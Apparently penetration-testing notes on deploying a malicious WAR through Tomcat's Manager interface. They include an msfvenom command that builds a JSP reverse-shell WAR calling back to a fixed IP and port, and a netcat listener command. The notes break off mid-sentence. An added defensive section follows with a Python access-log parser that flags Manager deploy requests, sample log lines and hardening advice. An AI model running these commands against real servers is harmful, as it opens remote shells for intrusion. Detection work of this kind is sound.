WAR upload reverse shell
- if we are in a Tomcat environment
- there are the management/html and management/text interfaces, which allow uploading new applications
- we can create a malicious WAR file (see https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war
- now open a nc to listen
sudo nc -nvlp 4242 -vvv
- there is the
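
The upload step above leaves a trace in Tomcat's access log, so the same notes can be read from the detection side. The following is an added example, not part of the original notes: it assumes the stock Manager context path `/manager` and the AccessLogValve `common` pattern, and the function name, field names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager requests that install a web application (assumed default /manager context).
DEPLOY_ENDPOINTS = {
    ("POST", "/manager/html/upload"): "html-upload",   # WAR sent as a form upload
    ("PUT", "/manager/text/deploy"): "text-deploy",    # WAR sent as the request body
    ("GET", "/manager/text/deploy"): "text-deploy-local",
}

def find_deployments(lines):
    """Return one dict per Manager deploy request seen in access-log lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m["target"])
        kind = DEPLOY_ENDPOINTS.get((m["method"], url.path.rstrip("/")))
        if kind is None:
            continue
        status = int(m["status"])
        events.append({
            "time": m["time"],
            "source": m["host"],
            "user": m["user"],
            "kind": kind,
            # Only the text interface carries the context path in the query string.
            "context": parse_qs(url.query).get("path", [None])[0],
            # The text interface reports FAIL in the body with HTTP 200, so this
            # means "the Manager accepted the request", not "the deploy worked".
            "accepted": status < 400,
        })
    return events

# Constructed sample lines (documentation address ranges, not from a real host).
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '192.0.2.10 - tomcat [12/Mar/2024:10:15:32 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 19987',
    '192.0.2.10 - deployer [12/Mar/2024:10:16:02 +0000] "PUT /manager/text/deploy?path=/reverse HTTP/1.1" 200 45',
    '192.0.2.10 - - [12/Mar/2024:10:16:10 +0000] "GET /reverse/ HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Mar/2024:10:20:44 +0000] "PUT /manager/text/deploy?path=/x HTTP/1.1" 401 2473',
]
```

Any accepted deploy event from an address or account that is not part of the release process is worth an alert, and restricting the Manager application to administrative hosts removes the exposure entirely.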